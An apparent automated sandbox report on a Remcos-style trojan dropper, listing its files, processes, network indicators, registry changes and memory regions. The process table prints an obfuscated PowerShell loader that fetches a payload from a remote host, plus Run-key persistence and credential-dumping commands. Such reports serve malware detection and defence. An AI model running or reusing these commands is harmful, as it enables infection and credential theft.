Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SKM_0001810-01-2024-GL-3762.bat
|
ASCII text, with very long lines (5885), with no line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zx0wacx.xlh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyqaojpc.ssl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irdkcli5.daw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzanuggo.thd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvDA52.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x637bc9fe, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmzmicbwjbyewkukqymzvfa
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Categorizes.Afg
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TW80TOSMRVX9KUD5BWWU.temp
|
data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKM_0001810-01-2024-GL-3762.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically
Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic)
{$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function
Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl
';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh
LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL
rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a
';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr
n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem.
dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser
(Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes
$ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser
(Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI
OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss
OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r
FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp
kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno
airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen
'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA
pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB
Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi
NsttNon i Ov.zResmaOr,itbu liblanoRappn.rsgsR.ad.horrH SoleHybea AnsdepileNor rZerssSkun[ Enr$No dm TzebJamio ,asrc cai Vin]kont=pe
s$ EncR ForeNutrsTot,i.relsSeretSvi.asubtn SpatFr aeOu,s ');$Makkerens=Overfallen 'Mir $CockD frdeO ses Me e Baln mans SkriIntetHereiNatizUncoaGau,t
Endii,osofro nuntes Odi.RounDSad,oSidsw LunnGalcl.radoaktiacynodApprF aboiD.fflAutoeSibs(Agra$AfseTPremh TidiHemirNa udkbere
usinTurrdSchoeim.oa n.sl Van,Re,y$CoroN FjeoPhrenHerauAft sByp eIantrThorsWeat)Nedr ';$Nonusers=$Engrospriserne;Indsigelser
(Overfallen 'Reel$ irtg agalArbeoT rtbCas A,kspLIndd:Graet avnRL,baeframsKnneiSem D AsteSmmeD,aanEjudaS Hy,=Dist(NachTImpuEFa
ts,bbatThob-LaryPsoc,A HintPro HHnge Unsu$pastnOpnao AwnN ltrUAlkaSRaptETarmr WassMarm) Tox ');while (!$Tresidedes) {Indsigelser
(Overfallen 'Nskv$sammgIn ilCr,moBeatbLadea ChulSimu:WinnSQuilaTronmAffalEpiteHirtmFe,saFll p S lpTesteTrain,kaa=L,kt$KimotBrysrF
niu Re eS cs ') ;Indsigelser $Makkerens;Indsigelser (Overfallen 'Fo mS.ybetAc,daAm.iRRapptBrea-Puncs rolL uze StaEP orPShod
Revi4Info ');Indsigelser (Overfallen 'le c$Ko eGMisel T.oOSinoBNomaAM ssL Eks:Die.t EgerflagEPhossA,rai Pr dTwisEWooddCirceE,ges
Jun=Udes(S ustTheceApodsSkretMel -MisbPKongaViseTVintH Lsk Nonp$Tnknn belo.ancNAll USkabSMarieSpitr DucSdonk)de.l ') ;Indsigelser
(Overfallen ' ee$ AntGObsel of.o SmebTerma ellPrei: ilsU O,sNSemiSProdyGarnSGigmTRekoE JewM CouaV kstPlaiiEx,esTi biSultNrebsgDi
csRs,n=Valg$F.ung CulL,hreoCol bUi,dAArbeL N s: TeaUAktiN TessPolyURingCSammc Sp eWowsESemidWongi VinnRhinGPeev+Lyri+Ele,%D
oz$PaleI FornUdglDS.gtOFemtmBlaaaEsteBRestl Kome Cri.RoofcMilioPsycUIndlngernT Hi ') ;$Thirdendeal=$Indomable[$unsystematisings];}$Brasilete=297855;$Dunkelt=31467;Indsigelser
(Overfallen 'F ra$A ilg ReolRe.eoSupeb ForaS,ucLSt.f: rbeaContBWorkjMediE.humC Na TKupp Kne= T.l DatgNo me.aisTGlis-ForscDkk,OVldiN
Selt L mESmlenHoffT Sti Eund$Angun atoUsocN UdvUpa kSIn uE InyRSy aS fte ');Indsigelser (Overfallen ' Ant$TilbgD khl ApooForsbHalfaSexclProt:WeenAT
enr.aedaAchlc SpehS penVogeiogeed veta LasnEdri Dags= t.t Subl[ elS IntyDrivsb.zotRelae intmSk t. oadCBabuoScolnHa ivConce
JenrLimft abs]We p:,ole:vandFKon rSynpoSealm WheBJag aSgetsBrugeKost6Macu4 UndS ingtU.akrGalai InfnGenog.eds(Gale$RendaBolibConvjLoope
BjlcCalot Ko )Wewe ');Indsigelser (Overfallen ' mpl$ TubGS.igLUdnvOKongBIndiA .ntLP,os:Ov.rNTeleMe anTRece Glio= Can mov[CornS
angYH.posOmbytUrocErimemUnsw.ArtiTBr.mE M.sxBronT nn.Pante inNKnogC Chao CoaD UnbIAlmuNLio g Reg] Ude: .ar:MickA FraSInteCM
goideniIdive.Bespggrone FortVollSLaagtbr wrLo dIKe inEspeGKapi(opkl$BisiAUdtrRSupeA Be,cSudaHBlasNLuetis.ordN ncaAn.eN Rat)Vava
');Indsigelser (Overfallen 'Spha$Bes GUnralLanaObataBVandA DecLEnkr:.oneTNordUE,ipiTalr=Kare$EumiN.quaMresptVoca. Ga.SOmsmUSup.BHollS
,roTSamfRKla,iZealNStadg Mar(syge$ WalB Gr,ReuroAA.tiS toiBi eLem.oeSlyptBiltETrma, For$ irkDblgeUAfp.nCu tkSpriERumllYtretBade)Anno
');Indsigelser $Tui;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth
#>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function
Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne;
for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function
Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl
';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh
LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL
rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a
';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr
n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem.
dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser
(Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes
$ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser
(Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI
OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss
OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r
FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp
kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno
airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen
'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA
pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB
Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi
NsttNon i Ov.zResmaOr,itbu liblanoRappn.rsgsR.ad.horrH SoleHybea AnsdepileNor rZerssSkun[ Enr$No dm TzebJamio ,asrc cai Vin]kont=pe
s$ EncR ForeNutrsTot,i.relsSeretSvi.asubtn SpatFr aeOu,s ');$Makkerens=Overfallen 'Mir $CockD frdeO ses Me e Baln mans SkriIntetHereiNatizUncoaGau,t
Endii,osofro nuntes Odi.RounDSad,oSidsw LunnGalcl.radoaktiacynodApprF aboiD.fflAutoeSibs(Agra$AfseTPremh TidiHemirNa udkbere
usinTurrdSchoeim.oa n.sl Van,Re,y$CoroN FjeoPhrenHerauAft sByp eIantrThorsWeat)Nedr ';$Nonusers=$Engrospriserne;Indsigelser
(Overfallen 'Reel$ irtg agalArbeoT rtbCas A,kspLIndd:Graet avnRL,baeframsKnneiSem D AsteSmmeD,aanEjudaS Hy,=Dist(NachTImpuEFa
ts,bbatThob-LaryPsoc,A HintPro HHnge Unsu$pastnOpnao AwnN ltrUAlkaSRaptETarmr WassMarm) Tox ');while (!$Tresidedes) {Indsigelser
(Overfallen 'Nskv$sammgIn ilCr,moBeatbLadea ChulSimu:WinnSQuilaTronmAffalEpiteHirtmFe,saFll p S lpTesteTrain,kaa=L,kt$KimotBrysrF
niu Re eS cs ') ;Indsigelser $Makkerens;Indsigelser (Overfallen 'Fo mS.ybetAc,daAm.iRRapptBrea-Puncs rolL uze StaEP orPShod
Revi4Info ');Indsigelser (Overfallen 'le c$Ko eGMisel T.oOSinoBNomaAM ssL Eks:Die.t EgerflagEPhossA,rai Pr dTwisEWooddCirceE,ges
Jun=Udes(S ustTheceApodsSkretMel -MisbPKongaViseTVintH Lsk Nonp$Tnknn belo.ancNAll USkabSMarieSpitr DucSdonk)de.l ') ;Indsigelser
(Overfallen ' ee$ AntGObsel of.o SmebTerma ellPrei: ilsU O,sNSemiSProdyGarnSGigmTRekoE JewM CouaV kstPlaiiEx,esTi biSultNrebsgDi
csRs,n=Valg$F.ung CulL,hreoCol bUi,dAArbeL N s: TeaUAktiN TessPolyURingCSammc Sp eWowsESemidWongi VinnRhinGPeev+Lyri+Ele,%D
oz$PaleI FornUdglDS.gtOFemtmBlaaaEsteBRestl Kome Cri.RoofcMilioPsycUIndlngernT Hi ') ;$Thirdendeal=$Indomable[$unsystematisings];}$Brasilete=297855;$Dunkelt=31467;Indsigelser
(Overfallen 'F ra$A ilg ReolRe.eoSupeb ForaS,ucLSt.f: rbeaContBWorkjMediE.humC Na TKupp Kne= T.l DatgNo me.aisTGlis-ForscDkk,OVldiN
Selt L mESmlenHoffT Sti Eund$Angun atoUsocN UdvUpa kSIn uE InyRSy aS fte ');Indsigelser (Overfallen ' Ant$TilbgD khl ApooForsbHalfaSexclProt:WeenAT
enr.aedaAchlc SpehS penVogeiogeed veta LasnEdri Dags= t.t Subl[ elS IntyDrivsb.zotRelae intmSk t. oadCBabuoScolnHa ivConce
JenrLimft abs]We p:,ole:vandFKon rSynpoSealm WheBJag aSgetsBrugeKost6Macu4 UndS ingtU.akrGalai InfnGenog.eds(Gale$RendaBolibConvjLoope
BjlcCalot Ko )Wewe ');Indsigelser (Overfallen ' mpl$ TubGS.igLUdnvOKongBIndiA .ntLP,os:Ov.rNTeleMe anTRece Glio= Can mov[CornS
angYH.posOmbytUrocErimemUnsw.ArtiTBr.mE M.sxBronT nn.Pante inNKnogC Chao CoaD UnbIAlmuNLio g Reg] Ude: .ar:MickA FraSInteCM
goideniIdive.Bespggrone FortVollSLaagtbr wrLo dIKe inEspeGKapi(opkl$BisiAUdtrRSupeA Be,cSudaHBlasNLuetis.ordN ncaAn.eN Rat)Vava
');Indsigelser (Overfallen 'Spha$Bes GUnralLanaObataBVandA DecLEnkr:.oneTNordUE,ipiTalr=Kare$EumiN.quaMresptVoca. Ga.SOmsmUSup.BHollS
,roTSamfRKla,iZealNStadg Mar(syge$ WalB Gr,ReuroAA.tiS toiBi eLem.oeSlyptBiltETrma, For$ irkDblgeUAfp.nCu tkSpriERumllYtretBade)Anno
');Indsigelser $Tui;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\tmzmicbwjbyewkukqymzvfa"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gjsxjnwrlsioiwwsrulujxhgmfcdr"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle
1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
renajazinw.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://artieri.ro/l/Squirtish.toc
|
89.44.138.129
|
||
|
http://artieri.ro/l/Squirtish.tocP
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://microsoft.co
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://artieri.ro/l/Squirtish.toc
|
89.44.138.129
|
||
|
http://artieri.ro/l/MhRliPwcjA146.bind
|
unknown
|
||
|
https://artieri.ro
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://artieri.ro/l/MhRliPwcjA146.bin
|
89.44.138.129
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://crl.m
|
unknown
|
||
|
http://artieri.ro/l/Squirtish.tocXR
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.microsoft.&o
|
unknown
|
||
|
http://artieri.ro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://artieri.ro/l/MhRliPwcjA146.bin
|
89.44.138.129
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
renajazinw.duckdns.org
|
193.187.91.216
|
|
|
|
artieri.ro
|
89.44.138.129
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.187.91.216
|
renajazinw.duckdns.org
|
Sweden
|
|
|
|
89.44.138.129
|
artieri.ro
|
Romania
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\involving
|
Elgkos
|
||
|
HKEY_CURRENT_USER\Environment
|
Consanguineous
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JTPTLW
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JTPTLW
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-JTPTLW
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
There are 12 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
21BF000
|
stack
|
page read and write
|
|
|
|
8B40000
|
direct allocation
|
page execute and read and write
|
|
|
|
83A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
299B0691000
|
trusted library allocation
|
page read and write
|
|
|
|
568C000
|
trusted library allocation
|
page read and write
|
|
|
|
95B6000
|
heap
|
page read and write
|
|
|
|
45A1000
|
heap
|
page read and write
|
||
|
A3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
28CE000
|
heap
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
4581000
|
heap
|
page read and write
|
||
|
2999E670000
|
heap
|
page read and write
|
||
|
6AF0000
|
heap
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
299B8A60000
|
heap
|
page read and write
|
||
|
299A23D8000
|
trusted library allocation
|
page read and write
|
||
|
BD01E4B000
|
stack
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
96B5000
|
heap
|
page read and write
|
||
|
2D9C000
|
heap
|
page read and write
|
||
|
255F0000
|
heap
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
299B8787000
|
heap
|
page read and write
|
||
|
4600000
|
heap
|
page read and write
|
||
|
299B862F000
|
heap
|
page read and write
|
||
|
247D0000
|
direct allocation
|
page read and write
|
||
|
6A50000
|
direct allocation
|
page read and write
|
||
|
299B090B000
|
trusted library allocation
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A81000
|
heap
|
page read and write
|
||
|
299B8950000
|
heap
|
page execute and read and write
|
||
|
25671000
|
heap
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
6D5B000
|
stack
|
page read and write
|
||
|
7D2D000
|
stack
|
page read and write
|
||
|
299A00F0000
|
trusted library allocation
|
page read and write
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
2924000
|
heap
|
page read and write
|
||
|
97E000
|
stack
|
page read and write
|
||
|
2999E773000
|
heap
|
page read and write
|
||
|
2D4A000
|
heap
|
page read and write
|
||
|
4580000
|
heap
|
page read and write
|
||
|
270C000
|
stack
|
page read and write
|
||
|
44A1000
|
trusted library allocation
|
page read and write
|
||
|
25050000
|
heap
|
page read and write
|
||
|
255F1000
|
heap
|
page read and write
|
||
|
2999E690000
|
heap
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
|
5634000
|
trusted library allocation
|
page read and write
|
||
|
2A4A000
|
heap
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
7FFD9B752000
|
trusted library allocation
|
page read and write
|
||
|
299A23CA000
|
trusted library allocation
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page read and write
|
||
|
299B8B4A000
|
heap
|
page read and write
|
||
|
7260000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
6E6E000
|
stack
|
page read and write
|
||
|
3354000
|
heap
|
page read and write
|
||
|
25933000
|
heap
|
page read and write
|
||
|
299B8B80000
|
heap
|
page read and write
|
||
|
98E0000
|
direct allocation
|
page read and write
|
||
|
3660000
|
remote allocation
|
page execute and read and write
|
||
|
B340000
|
direct allocation
|
page execute and read and write
|
||
|
45A6000
|
heap
|
page read and write
|
||
|
7FFD9B935000
|
trusted library allocation
|
page read and write
|
||
|
960C000
|
heap
|
page read and write
|
||
|
4B89000
|
heap
|
page read and write
|
||
|
24800000
|
direct allocation
|
page read and write
|
||
|
7D70000
|
heap
|
page read and write
|
||
|
299A01E0000
|
heap
|
page execute and read and write
|
||
|
286F000
|
stack
|
page read and write
|
||
|
BD00C7B000
|
stack
|
page read and write
|
||
|
4B83000
|
heap
|
page read and write
|
||
|
8155000
|
heap
|
page read and write
|
||
|
2920000
|
heap
|
page read and write
|
||
|
9606000
|
heap
|
page read and write
|
||
|
5648000
|
trusted library allocation
|
page read and write
|
||
|
2539E000
|
stack
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
2D2F000
|
unkown
|
page read and write
|
||
|
24BC0000
|
heap
|
page read and write
|
||
|
299A0220000
|
trusted library allocation
|
page read and write
|
